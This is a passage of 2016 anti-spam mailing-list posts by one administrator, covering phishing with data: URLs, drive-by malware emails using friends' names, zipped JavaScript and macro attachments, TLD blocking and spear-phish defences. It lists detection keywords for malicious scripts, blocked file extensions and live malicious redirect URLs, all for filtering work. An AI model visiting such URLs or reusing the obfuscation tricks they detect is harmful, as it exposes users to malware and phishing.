Set-Cookie: tinyUUID=7e020645a4cd45051c05; expires=Tue, 19-Sep-2017 
17:29:03 GMT; path=/; domain=.tinyurl.com
Server: cloudflare-nginx
CF-RAY: 2e4ec1fa555d3816-ATL

Here's the HEAD headers the next day (same Code, albeit compiled
in a Windows app rather than Penguin-land):

[ HEAD for URL http://tinyurl.com/easystorage42 ]
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 Sep 2016 19:08:17 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=db099f950a3ec03be684df56d1c5cb2191474398497; expires=Wed, 
20-Sep-17 19:08:17 GMT; path=/; domain=.tinyurl.com; HttpOnly
Set-Cookie: tinyUUID=7e18925a80f84470c686; expires=Wed, 20-Sep-2017 
19:08:16 GMT; path=/; domain=.tinyurl.com
Location: http://proj ect miya . com/images/index.htm
X-tiny: cache 0.0095739364624023
Server: cloudflare-nginx
CF-RAY: 2e5790b36552423d-MSP

** I put four blank spaces in the "Location", so nobody would
"be bothered". ;)  They were NOT in the actual output.

My first thought was network hiccup.  Then it struck me that this
was not a random/system generated one, rather it was one of those
"custom"/vanity(?) shorteners that often appear in ESP/snow.

I have no experience creating Shorteners.
*** Could someone who does, please weigh in on whether this may
be a new tactic? ***

If it is, it's almost clever.
For years, I've been poison pill scoring stuff like that, and
letting Quarantine re-testing sort things out. :)

* Does anyone have any idea of the significance of the "X-tiny"
header in the Windows vs Linux output?  It's probably trivial.


In general, this is a good example of the Phish I regularly see
sent via Gmail.  From.Realname is an oft phished target (never
fuzzed), SPF passes, and the English is generally well done.

The worst/best-done campaign (WOW/Blizzard/BattleNet) I've ever
seen went on for seven months, with no sign that Gmail even
noticed it. :\
- "Chip"

Re: spample of "data" URL in well-crafted Phish

[Chip M.]

On Fri, 16 Sep 2016, John Hardin wrote:
>Chip, could you send me some spamples of non-image data: messages 
>offlist? The only ones I have anywhere are images.

Sent last week - thanks for your ongoing work on this John! :)

After that request, I decided to add (in my post SA filter)
a minimally scoring test for "data:", to make it easy to find new
variants (in my log viewer, I can flag any test as a "warning"
which flashes an ugly yellow UI thingamajig, so I don't have to
remember to Look for Stuff).

My first hits have all been a new Snowshoe image variant that may
be of (mild) general interest:
http://puffin.net/software/spam/samples/0044_data_embedded_snow.txt

Nowhere near as dangerous as Phish, but more "pee-in-the-pool"
evidence that sane senders should avoid this technique. :\
- "Chip"

Re: drive-by malware customized to the From.RealName of actual Friends

[Chip M.]

John,
thanks a TON for your efforts!  I was afraid this would be hard
to catch. :(
On the bright side, the campaign has been morphing, and they are
now (IMO) much less enticing, which is a partial victory. :)


** Update:
The emails have gone thru two more significant morphs, first with
To.Realname in the URL, then with neither Realname in the URL.

The cracked sites are now sometimes using meta-refresh instead of
or in addition to a server redirect.  The scripting at the
destinations has changed.  All remain eminently straight forward
to test.

They continue to use cracked GoDaddy domains, and it's taking
over a week to catch/"fix" the ones I've checked.
I took a look at GoDaddy's abuse reporting, and, alas, 
it's javascript-only. :(

*** Does anyone know of a clean/safe means to report these,
or have a contact at GoDaddy?

For more than 10 years, I've been tracking Realnames in the
"Friends" database of my hand-classification system.
I have a (batch) regression test that I can run daily to find
these, and would be happy to send the complete URLs to GoDaddy.
Disclaimer: my feed is LOW volume, however the delivery mechanism
is continuing to morph, so at the very least my trickle should
help GoDaddy keep a (putative) detection script up to date.

Plus, it's a TON more satisfying stymying the smarter-than-skwerl
class of spammers. :]
- "Chip"

P.S.  Some old friends let me crash with them for the duration of
the two dreaded anniversaries (9/11 & Nimda), so I was able to
get some useful work done. :)
Now I just have to get caught up on everything else!

Re: Catching well directed spear phishing messages

[Chip M.]

On Thu, 30 Jun 2016, Olivier Coutu wrote:
>The other way to fix that is to detect the lexical distance between the 
>sender's domain and your organisation's domains, e.g. by building a 
>plugin that uses https://en.wikipedia.org/wiki/Levenshtein_distance. 
>That could be done for a small number of domains within a few hours. In 
>my experience results are impressive and it's really awesome to block 
>such a personalized attack, although this spoofing method is not used 
>that often due to its cost. Mail me if you want the core of the code to 
>do those checks. 

That sounds VERY interesting, Olivier! :)

What language is it written in?
I'll be contacting you off-list. :)

Have you used that technique to generate tokens for regular
Phish prevention (e.g. all the myriad variations on Paypal)?


>You can keep a list of the executive names in your SA configuration, 
>but good luck on catching all variations.

That got me thinking...

Catching variations can NEVER be perfect, however,
performing EXACT matches is easy and reliable.

In most email systems, it's close to trivial to rewrite headers,
in particular the Subject header.

Given that (at each domain) the number of spear-phish-relevant
senders & recipients is very small, and we know whether they're
authenticated and sending from the "correct" IP(s), we can do
exact matching just on email "From" the pool of money-authorizers
and "To" the pool of money-movers, then modify the Subject at the
SYSTEM level with a "magic token" only known to the money-movers.

All other emails would remain unmodified.
Nobody else should know the current "magic token".

It took me about an hour of Coding to add that to my post-SA
filter and has been in use at one of my domains (a charity) for
over a month.  They're not at high risk, however they have been
receiving a steady trickle of well-targeted scams/malware and
have been worried, so were enthusiastic volunteers when I
explained what I wanted to experiment with.  They're not Techies,
however they're attentive, cautious, and awesome at 
asking questions & giving feedback. :)

I set it up on just one sending account (which has been regularly
spoofed), and three recipients.

I felt it would be easier (for the endusers) if we used a
two-part "magic token", with one part being human-readable &
"friendly", and one part being random (e.g. "[banana-38DYIT]"),
so the recipients could first screen on the easy to recognize &
remember part, then look up the random part on a printed list.
I asked the recipients to create their own list of "friendly"
tokens (and encouraged them to have fun with the task), then
generated a random token to pair with each, and set things up so
the two-part token automatically changes each weekend.  They keep
the printed list (tokens) in a drawer.

So far, there's been no technical issues.
Satisfaction is high and none of the three has expressed any
discomfort with seeing the extra token in their email clients.

After a couple of weeks, I sent a few RealName spoofs, and they
immediately spotted & reported all of them.  Disclaimer: they did
know I'd be testing them (and were enthusiastic about it).

One feature I'm considering adding, is removal of the token when
they reply to the Money-Authorizer/sender.  That would keep the
token private to the only people who need to see it.

** Can anyone think of any flaws in that, other than a cracked
Money-Authorizer account?
It's NOT idiot-proof, however it does give attentive non-techies
a simple & easy to see "code", and puts zero burden on the
Money-Authorizers, who tend to be the ones resisting change.
It's a lot easier on sysadmins than using a desktop addon. :)


*** Yet Another Idea (not yet implemented):
Many companies have a helpdesk email address that endusers are
told to forward questionable email to.
Great in theory, but the problem is that there's a human in that
loop, and most endusers are deeply reluctant to appear ignorant
or risk being chastised for "wasting time".

What if there was a mailbox that ran software that performed a
detailed technical analysis, then sent back a human friendly
report?

For example, with the "drive-by malware" campaign that I posted
last week, almost all travelled thru two IPs located in "unusual"
Nations, and the URL redirected to a 2nd URL at a newly
registered domain, that contained pure javascript.
The report might look something like:
You have previously received email from "James Kirk",
but never from the email address in this email.

It was sent from India, thru Great Britain.

It contained a link that was redirected to a brand
new domain, which looks like drive by malware.

Rating:  DANGER! DANGER! DANGER!

Blocking stuff like that campaign takes significant extra lookups
(particularly WHOIS) at gateway time, but time wouldn't be an
issue with a small batch of human selected "uncertain" emails.

Endusers should be told up front that the only time a human
Techie would 

Re: spample of "data" URL in well-crafted Phish

[Chip M.]

On Thu, 8 Sep 2016, John Hardin wrote:
>Yes. Given that ID on the first line the corpus owner can find the message 
>in question, review it, potentially fix misclassifications (that has 
>happened before), etc.

Shiny - that sounds perfect! :)

>There's one more exclusion I can add that will take out the last
>of the FPs in masscheck.

Thanks John!

Sadly, I have more FP data for you. :(
This week, two semi-well-known companies decided to join the
Embedded Data Hall of Shame:

"Overstock.com" (overstock.com)
831,744 bytes
X-Spam-Status: No, score=-3.2 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, HTML_IMAGE_RATIO_02, HTML_MESSAGE, MIME_HTML_ONLY, 
RCVD_IN_MSPIKE_H3, RCVD_IN_MSPIKE_WL, RCVD_IN_RP_CERTIFIED, RCVD_IN_RP_SAFE

"Dave & Buster's" (daveandbusters.com)
806,962 bytes
X-Spam-Status: No, score=1.8 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, HTML_IMAGE_RATIO_02, HTML_MESSAGE, MIME_HTML_ONLY, 
RCVD_IN_DNSWL_NONE

Sadly, both hit on my test for:
href='data:
So the score for that should definitely be capped.
Fortunately, all these are otherwise scoring quite low.

Here's one specific example (just a single very long line from
one corpse):
  background-image: url("data:image/svg+xml;charset=utf8,%3Csvg width='104px' 
height='82px' viewBox='0 0 104 82' version='1.1' 
xmlns='http://www.w3.org/2000/svg' 
xmlns:xlink='http://www.w3.org/1999/xlink'%3E%3C!-- Generator: Sketch 3.6.1 
(26313) - http://www.bohemiancoding.com/sketch 
--%3E%3Ctitle%3Ediamond%3C/title%3E%3Cdesc%3ECreated with 
Sketch.%3C/desc%3E%3Cdefs%3E%3C/defs%3E%3Cg id='Current' stroke='none' 
stroke-width='1' fill='none' fill-rule='evenodd'%3E%3Cg 
id='Settings-Not-Supported-Grammarly-2' transform='translate(-241.00, 
-183.00)'%3E%3Cg id='4-copy-4' transform='translate(45.00, 
41.00)'%3E%3Cg id='The-Settings' transform='translate(75.00, 
63.00)'%3E%3Cg id='Not-Suported' transform='translate(1.00, 
56.00)'%3E%3Cg id='Google-Docs' transform='translate(34.00, 
0.00)'%3E%3Cg id='diamond' transform='translate(75.00, 
0.00)'%3E%3Cimage id='Image-1' x='0' y='0.0800019' width='127.919997' 
height='127.919997' xlink:href='data:image/pn
 g;base64,iVBORw0KGgoNS
Which was in a huge (700+ Kb) set of Style blocks. :(
I'll send you both corpses, tonight, if you're interested.

I took a closer look at the "ClubNorton" monstrosity and it also
hit that test, and has many other similarities, so this appears
to be a new email "authoring" app. :(

For completeness, "ClubNorton" was:
812,383 bytes
X-Spam-Status: No, score=1.0 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, HTML_MESSAGE, MIME_HTML_ONLY, RCVD_IN_DNSWL_NONE, 
RCVD_IN_MSPIKE_H3, RCVD_IN_MSPIKE_WL

That puts the inventors of the Hamster Cannon in the lead, in
terms of size and pandering to safe-listing "services". :(

I asked the recipient/survivor of the new duo to forward them to
his own account and tell me how they render in Outlook, and he
kindly sent me a screenshot, mostly to show an alert that Outlook
added:
"If there are problems with how this message is displayed, click here to view 
it in a web browser."

Purely IM(subjective)O, that sounds like even Outlook was a bit
disgruntled with it.
- "Chip"

Re: Anyone else just blocking the ".top" TLD?

[Chip M.]

On Thu, 8 Sep 2016, "lists [at] rhsoft.net" wrote:
>i get a diff-output per mail each time the mailserver configs
>are changing

That's a completely valid approach, and I am a big fan of
pre-emptive first strike (only as applied to potentially evil
email).

However, the vast majority of those TLDs will never
"go rogue", so I prefer to block on actual abuse
(Jason's approach), or likelihood of abuse, specifically, very
low cost.  Jason appears to have much higher volume than I do,
so he'd be a good source of data for me and others.

IDIC... or to each his/her own preferred approach. :)
- "Chip"

Re: Anyone else just blocking the ".top" TLD?

[Chip M.]

On Sat, 09 Jul 2016, jasonsu wrote:
>Fwiw, atm I block all of the following TLDs
...
>men,
..
>That list is auto-generated.  Any & all TLDs that have 
>sent > 100 messages within the last year *AND* have a 

Great approach Jason! :)
".men" just recently appeared in my data, and is not showing up
on that Surbl tld page.

Please do share any more that you notice. :)

".men" is going for as low as $1.49.
It's only appearing in some of my domains, but is running
between about 8% and 34% of their snowshoe spam.
- "Chip"

drive-by malware customized to the From.RealName of actual Friends

[Chip M.]

Spample:
http://puffin.net/software/spam/samples/0043_driveby_from-rn_in_url.txt
I removed 19 (of 20 original) email addresses out of the
To header, ST:TOS munged all remaining email addresses, and
munged the target URL to match the other mungings.
Everything else is exactly as received, immediately post-SA.

This campaign has been going on at a low but steady
rate (typically 0.2% to 0.4% of spam) since at least late May.
It uses very simple and effective social engineering which leads
the victim to a cracked legit-ish site, that redirects to a
drive-by malware site which is controlled by the miscreants.

*** Analysis:
The pattern is that the complete From.RealName is used as the
final subdir in the URL, with an underscore between each word
that was in the RealName.  The original cAsEs are always used
(e.g. "Montgomery Scott" goes to "/Montgomery_Scott/" and
"leonard mccoy" goes to "/leonard_mccoy/").

There's between zero and two trailing "/".
There is always a subhost, except for the earliest instances.
There are no parameters, so the final subdir STANDS OUT well,
looking like a personal/vanity website at a free provider.

All have those "Apple-Mail" boundaries.
They're usually To multiple people (20 being the most common),
but not always (particularly the early ones).
The body text is always brief with a general upbeat tone.
The Subject is almost always "Re:" (except in the beginning).


*** The impressive part is that the From.RN is always that of a
genuine Friend/correspondent, and often (about 64%) the
To.Realname is correct (otherwise it's blank, so it's never
"wrong").
The From.Address is always "wrong"/new/unknown.
The source of the data collection appears to be Yahoo account
cracks.

I've spot checked several of the URLs (using a raw HTTP tool),
and they always 302 to pure javascript booby-trapped pages at a
different domain.  I've substituted other subdir names, which
always 302 to the same (external) URL, so there's nothing 
sophisticated at that end.

The original URL is usually at a legit-ish semi-dormant GoDaddy
hosted domain.  I suspect GoDaddy must have a tool that makes it
easy to create subhosts, plus they're often targeted due to less
sophisticated endusers.  Until recently, most were never listed
on any Domain Blocklist.  Most of the redirects are eventually
taken down, though it often takes a couple of weeks.

Of the drive-by-malware sites I've checked, all have been recent
registrations (presumably by the miscreants), and typically
remain active long after the take downs of the "cracked" sites.

Today, I checked the URL in the spample, and both it and the
drive-by-malware redirect are still "live", in case any of you
would like to investigate further. :)

The very first one I spotted was only "To" me, from an old
friend.  When I saw it, my first reaction was delight and
I genuinely was drawn to visit the link... even though I was
viewing it in quarantine, and quickly spotted lots of Bad Stuff
(Received IPs tour-of-the-world).  It's simple yet VERY effective
social engineering, while being light-weight and so obvious it's
not. :\
I had noticed the pattern before, but had assumed the
Realnames/subdirs were random.  If I hadn't been sent any myself,
I probably would NOT have recognized the effectiveness of the
pattern.

I wrote a batch regression test to find these, not in real-time
but in old data so I could verify the algorithm & datamine.
Unfortunately, I've had some :( Kobayashi Maru scale "schedule
disruptions", so have NOT been able to do much testing other
than my primary Geek domains, and partial testing by one of my
best Volunteers with a highly-IDIC corpus (I'm desperate enough
I'm going to try a hotel, so I can complete this and other
critical testing).

So far, all but one FP occurred when I matched "anywhere" 
(soft match) in the URL, instead of doing a word-boundary match
on the last token.  The signature is always at the very end,
without any parameters, though it would be easy for them to
obfuscate with param(s).  Granted, that would (IMO) reduce the
efficacy of the social engineering. :)

The one exception was a Twitter URL.  Using an existing skip
domain list eliminates that case.  It's still possible to have
other FPs, so a simple match is unlikely to be a Poison Pill
candidate.

Last week, I sent John Hardin some spamples, and he very kindly
wrote & masschecked rules over the long weekend (Geek!). :)
He found a significant FP risk.

Depending on your environment (quarantines rock!), this may be
worth the risk.  The non-Bayes SA killrates for these are running
in the range of 0% to 18%. :(  Even with Bayes, most are getting
thru.  Mine are mostly being killed by Nation-of-IPs, and a few
pre-existing specialty tests (all post-SA).  I have not yet
needed to add custom rules, however I am considering it, due to
the malware risk.


I'm posting this in the hope that someone(s) will nudge GoDaddy
and other cheap hosts to scan for offsite redirects, then test
them.  

Re: spample of "data" URL in well-crafted Phish

[Chip M.]

On Sat, 3 Sep 2016, John Hardin wrote:
>I've tweaked the FP avoidance a bit, maybe that will be enough
>to get the S/O up high enough to publish it.

John, do you have any detailed info about the Ham hits?

I just datamined my three best corpora, from the beginning of
2014 thru this weekend, and found zero FPs, except for two hits
on that "img" test.  My data does NOT prove it's impossible for
anybody else, but it does seem odd, so I'm wondering if the
SA MassCheck mechanism has some means for the contributor to
pull out the corpses of specific hits.
If it doesn't, that would be a cool feature to add. :)


On Wed, 31 Aug 2016, Axb wrote:
>IMG src="data  can FP a lot.

AXB,
You are correct.
A few months ago, I had moved that rule in with my other "data"
rules, apparently because they had the token "data" in common.

I dug thru my notes, and the image rule was originally added to
combat a semi-subtle snowshoe campaign sent via Linode (as hosts,
they're much better than the other big-cheap-VPSs, so I've been
resisting scoring their IP blocks, which means that snow sent
thru them is sometimes harder to catch).

When I checked all data for 2014 to now in my three best corpora
(about 840 K-spam), I found that all the image spam hits were in
snow, and were NOT overtly dangerous, whereas all the non-image
"data" stuff has been in well-crafted Phish (UBER-dangerous).

There were exactly two Ham hits, and both were :grind-teeth:
ostensibly legitimate, albeit non-urgent.

Perhaps ironically or merely sadly, one was an 800 Kb monstrosity
of HTML badness (yes, all in one single Part), with several 
images and :cring: fonts inlined via "data" statements.  When I
tried to view it as an HTML page in my raw corpse viewer (using
an old-ish open source HTML rendering engine), it grinded away
for a while then died. :(
Who was the Sender?
Norton.
Yes, THAT Norton.
... and the Subject header was:
"ClubNorton Newsletter: Avoiding Social Engineering Tricks on Social Networks"

I've been scoring my data img rule at about 2.3 so it's well
below Poison Pill, and would not have caused either of those two
Hams to die.  Though I would not have lost sleep over a
Mercy Killing of the "ClubNorton" monstrosity. ;)

Bottom-line:
I strongly recommend a high scoring non-img "data" rule, and
gently recommend a modest scoring img "data" rule.
Everyone's mileage will vary, as always. :)
- "Chip"

P.S. Javascript... I agree 100% with John, while respecting AXB's
right to disagree and choose his own poison. ;)
I'll describe what I'm doing later, in a separate thread.
It's flexible enough to provide good protection, while letting
in all but the self-injurious Ham (e.g. someone at Amazon drank
some of the ClubNorton koolaid).

spample of "data" URL in well-crafted Phish

[Chip M.]

Freshly caught Spample:
http://puffin.net/software/spam/samples/0042_data_embedded_phish.txt
The only munging was inserting ".EXAMPLE" between "wellsfargo"
and ".com".

Four years ago, I read this fascinating article:
http://isc.sans.edu/diary/%22Data%22+URLs+used+for+in-URL+phishing/13996
and promptly added a simple word test to score these.

At the time, I had no idea whether these occurred in Ham
(seemed unlikely, but some Hammers are stunningly "thick"
(*cough, iframe, un-cough*)).

Since then, I've seen a steady, very low volume of spam hits,
with zero Ham hits (volume of about a quarter million emails
per month).
Yes, "ZERO" Ham. :)


Most of them have followed the same pattern that's in this
spample:
The MIME encoded "data" URL decodes to a classic Phish page.
Inside that, there's usually a small encoded bit of javascript,
typically starting with:
document.write(unescape('
In this case, it decodes to (target URL munged/replaced):
http://EXAMPLE.COM/wp-content/uploads/vrr.php; 
class="button" method="post" name="submit" id="submit">'

I just did a raw HTTP GET on the actual final URL, and it
returned a 302 with a Location of (genuine) Wellsfargo, with a
parameter starting with:
/login?ERROR_CODE=
followed by a 36-character-long code.

I did another raw GET of that Location, and it returned a 302
with a Location of WF's plain URL (no parameters), and the
document body was a terse, semi-"offshore"-speak:
This document you requested has moved temporarily.

It appears someone reported it to WF, who successfully did a
take down, but instead of providing a pedagogic page that
explained that the victim would have been toast, they chose just
to passively track accesses. :(


** Mitigation:
The easiest way to catch these is with a simple body word match.
Here's the exact matches I am currently using (some of them are
recent additions, listed in date of addition order):
href="data:
href='data:
http://data:
data:text/html;base64

Re: SA cannot block messages with attached zip

[Chip M.]

On Wed, 8 Jun 2016 17:23:59 -0400 Alex wrote:
>Meanwhile, there is RTF spam that's circulating which is
>currently bypassing the sanesecurity sigs. I've just submitted a
>sample to Steve, but the db hasn't yet been updated. Here's a
>sample:
>
>http://pastebin.com/ALsSAmwa

Alex, thanks for the spample! :)
I've seen a steady trickle of those, since late April.

That file attachment is actually the way-kewl "Office Open XML"
format, with an embedded VBA binary file, just like last week's
main vector for "Zepto" (a new ransomware morph), except those
used the (more correct) file extension ".docm".

The way-kewl thing about this file format is that they're
completely standard zip files, containing a mix of other mostly
standard files (e.g. XML, JPEGs).  In general, they're very easy
to parse (no obscure Microsoft OLE/etc in the main files).
The VBA is always in a file named "vbaproject.bin".

Since filenames in zip files are stored unaltered, it's just a
matter of de-MIME-ing the file, and scanning for the filename.
You do _NOT_ have to parse the zip file, just look for that one
simple string. :)
(Pedantic note:  Technically, there's another file named
"vbaProject.bin.rels" which is a plain text XML file.
Theoretically, you may want to exclude it, but practically, I
wouldn't bother - it seems to always occur with the binary ".bin"
file, so just nuke/quarantine them all.)

A couple of years ago, I changed my post-SA Filter so it always
tests the first few "raw" characters of every MIME Part, and if
they're the prefix that means PKZip, I de-MIME it and send it
thru my zip analyzer, regardless of ContentType or file ext.
I got fed up with all the Spammer Stupid Part Tricks, and it's
blindingly fast to check the prefix. :)
- "Chip"

P.S.  Thanks everyone for the followups on how Foxhole handles
stuff. :)

P.P.S.  Today's new malware morph is a single zipped javascript
file, where the script filename ends with "..wsf".
Is the double dot just a mistake, or does that confuse anything?

Re: Anyone else just blocking the ".top" TLD?

[Chip M.]

Thanks for all the lists and references, everyone! :)

+1 on block-by-default combined with "skips" for the VERY rare
exceptions.
I'm scoring (poison pill level), not gateway blocking (more about
that in a later post).

*** New Snow TLD sighting:
Since June 30, the TLD ".stream" has been snowballing, and 
now (in my data) is occuring at a greater volume than ".top".
As of July 7, it's present in more than half of _ALL_ my
snowshoe spam.

While researching it, I found this handy "Cheapest Domain
Prices" site:
https://www.domcomp.com/tld/stream
https://www.domcomp.com/tld/top
The ever-anti-reliable NameCheap is beating the pack at $0.88 per
.stream domain (same as their price for .top), so I expect the
popularity of .stream to continue.
- "Chip"

Re: Catching well directed spear phishing messages

[Chip M.]

On Tue, 28 Jun 2016 14:13:57 + David Jones wrote:
>If I search the Internet for the CEO/CIO/CTO/etc of a company
>and send and email from my domain but make the displayed name
>in the visible From: be that CEO/CIO/CTO/etc's full name that
>the recipient is used to seeing in the mail client, then I have
>spoofed nothing detectable in advance by SA or any mail filter
>technology.

Excellent summary!
The key is that the number of spoofed people is extremely SMALL,
and we _CAN_ anticipate who they are.

It's easy to write a CUSTOM set of rules just for actual/likely
targeted senders (CEO/etc).
For each person/target, create a rule that tests an explicit
list of that person's normal Realname(s) (including reasonable
variations), against the Realname part of the From header, and
if there's a match, test whether the From Address is in a list
of allowed addresses.  Score only if it's a probable phish
Realname from an unknown/unallowed address.

There's lots of potential metas for even a low-scoring rule
(e.g John Hardin's tip).

I've been doing this since 2009, both on a generic basis
(built into my "phishy tokens in headers" anti-phish system),
and on a custom domain level as we notice/anticipate targeted
individuals (all in my post-SA filter - sorry, I have no
examples of SA rules, and am ASSuming they'll be easy to write).

It works extremely well and is easy to maintain. :)


*** Implementation issues:

1. There's potential for name collision, however these would be
manually generated rules, so the maintainer would use his/her
judgement to assign scores.  For example, "Mark Sheppard" is
more likely to have a collision than "Chiwetel Ejiofor". :)

It would be straight forward to add an explicit list of (sender
verified) email addresses to exclude from testing.

In the seven years I've been doing this, I have had zero
collisions, however I have had an occasional FP when a targeted
sender starts sending stuff from himself using a new personal
email address, and does not notify the email admin.  In those
cases, even without a quarantine, the sender should notice it.
A smart quarantine always makes life better.

2. Ideally, one should remove chaff (including potentially
obfuscatory middle initials) and excess whitespace from each
email's From Realname before doing the comparisons.

3. A big issue is fuzzing of Realnames, which is name dependant.
For most Westerners, most spelling variations in "Mark Sheppard"
are much easier to notice than in "Chiwetel Ejiofor".  Leaving
out one of the double-ps in "Sheppard" would be a sensible
variation to add to his (hypothetical) list.

I have not yet noticed any fuzzing "in the wild", however all of
my targets have extremely "anglo" names.  I recommend looking at
tools that create fuzzy variations.

I have seen MANY fuzzes of big non-spear phish targets
(e.g. "paypa1" "paypa"), and have been adding them as they occur.
I plan to add a fuzzy algorithm during my next dev cycle.

4. As John Wilcock mentions, fuzzy domains are an issue.
If you're a target, it's worth generating a list of most likely
variations, then score/block the un-registered ones, and make an
informed decision on the rest.

5. I STRONGLY recommend scoring all "ACE prefix" domains, to
reduce/eliminate all the subtle and/or invisible variations.
We've been doing that for two years, and so far have had 
zero "skip" domain requests.  Note that all our domains are
"Western" centric, though we have a few accounts who do have
regular contact with Unicode-type nations.
You all know your own email ecologies. :)


+1 to all the sensible remarks about good authorization policies.
The best defense has as many layers as practical. :)
- "Chip"

Re: SA cannot block messages with attached zip

[Chip M.]

At 04:07 AM 5/20/2016, Dianne/RoaringPenguin wrote:
>We list the contents of attached archives 
>(using "lsar") and have filename-extension rules that block .js 
>inside .zip files. While this can lead to some FPs, which we handle 
>with selective whitelisting, it's very effective at catching the 
>latest crop of cryptolocker-style attacks.

I was looking more closely at the Foxhole page, and it SOUNDS
(to me) like they do _NOT_ block on ".js" file extension,
whereas you/Dianne do:

"This database will block most JavaScript (.js) files within within Zip, Rar 
files"
...
"To help minimise false positives, this database will only scan small sized Zip 
and Rar files."

*** Questions:
*1. Could someone clarify whether Foxhole is using some sort of
signatures on ".js" files?

*2. How did Foxhole perform on the recent campaign with duplicate
large zipped js files (e.g. 5 files of 236 kilobytes each)?
There was also a campaign with a single large file (e.g. 604
kilobytes), with most of the payload at the end.  I suspect both
campaigns were attempts to bypass sig based scanners.

I'm with Dianne on outright blocking js files, AND making highly
selective holes for specific sender/recipient pairs.
I protect a few thousand accounts and we only have a handful of
those holes, all for web designers.
"Aim small, miss small" :)

In my previous post, I mentioned "secret sauce" code to detect
javascript obfuscations.  That's a backup in case netscum figure
out a way to use a non obvious file extension.  FIRST, I do all
the quick tests (file extensions, etc), then, if there's enough
time, the slower/memory-heavy tests.  The recent large js file
campaigns took significantly longer (1/2 to 1 second) to do my
extra tests, but still hit all my tests. :)


*3. Is the list of file extensions on the Foxhole page complete?
http://sanesecurity.com/foxhole-databases/
The page is missing the following (and perhaps others):
.acm
.ax
.dll
.drv
.efi
.mui
.ocx
.tsp
I verified that all of those actually occur and are executable
on a Windows7 machine.


I have seen, in the wild (about a year or so ago), malware email
that instructed the target to rename the attached file. :(
Long before that, I had added code to decompress just the first
few bytes of each zipped file, and check for executable
MagicNumbers (e.g. Windows' "MZ").  I also check all MIME parts
(I have a very speedy "MIME Prefix" test).

I recently added the MagicNumber for "old" style doc files, just
for files inside zips (when they appeared, as mentioned in my
previous post).  That does have a higher FP risk, since it's
reasonable to zip huge doc files, however in practice they're
rare, and I have an excellent Quarantine/FP pipeline.

A friend sent me this cool MagicNumber look up site:
filesignatures.net
Any other suggestions for file types to add?
- "Chip"

Re: SA cannot block messages with attached zip

[Chip M.]

At 04:07 AM 5/20/2016, RoaringPenguin wrote:
>filename-extension rules that block .js 
>inside .zip files.

+1

We also block these scripting related Windows extensions:
.hta
.jse
.vbs
.wsf
Those were originally "pre-emptive", however I've now seen
both ".hta" and ".jse" in the wild (low volume).

*** Question:
Are there any other Windows (or Mac) scripting file extensions?


As an extra layer of defense, We also do content scanning within
all zipped files for terms including (among MANY others):
activexobject
base64_decode
createobject
eval
fromcharcode
savetofile
shell
unescape
wscript
All hits are weighted, and some can be skip-listed.
 
Plus I recently wrote some "secret sauce" Code that looks for
javascript obfuscations. :)


We've had a very low FP rate on the above, and haven't had any
noticeable user pushback.  There have been enough high profile
infections (at least two hospitals), that most endusers have
been grateful and understanding.


>Doing it properly requires a non-trivial amount of coding.

Yes, however it's VERY satisfying Coding. :)
- "Chip"

P.S.  As of about 1700 UTC yesterday, I'm seeing significant
volume of zipped macro-encrusted "doc" files.

re: exploitable LinkedIn forwarder/whatever

[Chip M.]

Thanks Andreas! :)

Wednesday am, after re-checking that the specific spam URL was
still forwarding to the spam payload destination, I emailed that
role account... and to my (VERY pleasant) shock, received an
auto-reply which did NOT direct me to an unuseable web form
(i.e. the Google model of preventing reports).

Three hours later, I re-checked the original URL, and it no
longer was forwarding. :)

I don't know if they did anything to the actual forwarder, but
at least I know it's NOT a waste of time to send reports. :)

I will definitely submit directly, in future.


And now, the bad news:
1. The original destination was just the first hop in a
forwarding chain, with a total of six (6) hops. :(
That should have been trivially easy to detect, automatically.
The first Location feels rather brazen (i.e. an obvious redirect).
My gut feeling is that the spammer may have been testing
LinkedIn's defenses.

2. The original spam was submitted to SpamCop, which
printed (in red):
"ISP does not wish to receive reports regarding http://www.linkedin.com/slink - 
no date available"

As a precaution, I'm now outright killing "linkedin.com/slink".

I'm particularly annoyed at this forwarder, because LI has a
Shortener service.  If the spammer had been restricted to
using a Shortener, my system would have caught it easily
(technically that spam was blocked, but just barely).

*** Question:
Are there any good public lists of, um, "weakly defended"
forwarders/redirectors?

One of the reasons I posted that spample, is that it is an
excellent example of a terse spam exploiting only well known
services.  This pattern recurs regularly, though always at
low volumes.

We educate our users to be cautious with unknown URLs, but I
wouldn't blame any non-techie who succumbed to the double-whammy
of a URL with a very familiar domain sent from the cracked account
of a bona fide friend. :(
- "Chip"

exploitable LinkedIn forwarder/whatever

[Chip M.]

Spotted a new exploited forwarder of some sort at LinkedIn -
full spample:
http://puffin.net/software/spam/samples/0041_linked_forward.txt
Except for the munged "To" and "From" email addresses, that's the
pristine network image.

It came From a known friend at "swbell", who normally sends thru
Yahoo, and has previously been cracked.

At first I assumed the URL was for an actual webpage, so I ran a
raw GET on it/this:

https://www.linkedin.com/slink?code=ecPnYgf?152=ofobakj&2643==45612858

and got a zero length document with these headers (cookie redacted):

HTTP/1.0 301 Moved Permanently
Server: Apache-Coyote/1.1
Location: 
http://www.shopinoklahomacity.com/redirect.aspx?url=http://icynybo.freedom007.top/free/dom/?gelaxo
Content-Length: 0
Vary: Accept-Encoding
Date: Tue, 17 May 2016 20:25:17 GMT
X-Li-Fabric: prod-lva1
Connection: keep-alive
X-Li-Pop: prod-ech2
X-LI-UUID: hNLOXbN0TxQQdMWE/SoAAA==

The redirect in the Location URL should have been a red flag to
any automated security scanner. :\

I re-ran it as a HEAD with a User-Agent that should have
screamed "spam", waited a couple hours, repeated, rinsed, stewed,
then decided to post here.

*** Does anyone have a contact at LinkedIn ops? ***

Sadly, LinkedIn follows the Google/Gmail model of failing to make
core functionality (like reporting spam) useable without
disabling/lowering one's browser security settings/shields. :(
- "Chip"

Re: new(ish) malware: RTF with MIME payload

[Chip M.]

Thanks guys, for all the helpful info and sanity checks! :)

Sorry about the Message-ID munging - I get some really useful
malware at that domain but no ham, and am a bit paranoid about
losing that feed.


Followup:
>I had considered anchoring the MIME string, however we have a 
>very powerful quarantine system, so I kept that rule simple. 
>We've had zero FPs on either rule, albeit only in xml/doc/msword 
>files.

I changed my system to run that MIME string test on all message
parts (plain text, de-MIMEd file, de-MIMEd non-file MIME), then
we did a regression test on all 2015 & 2016 ham for most of our
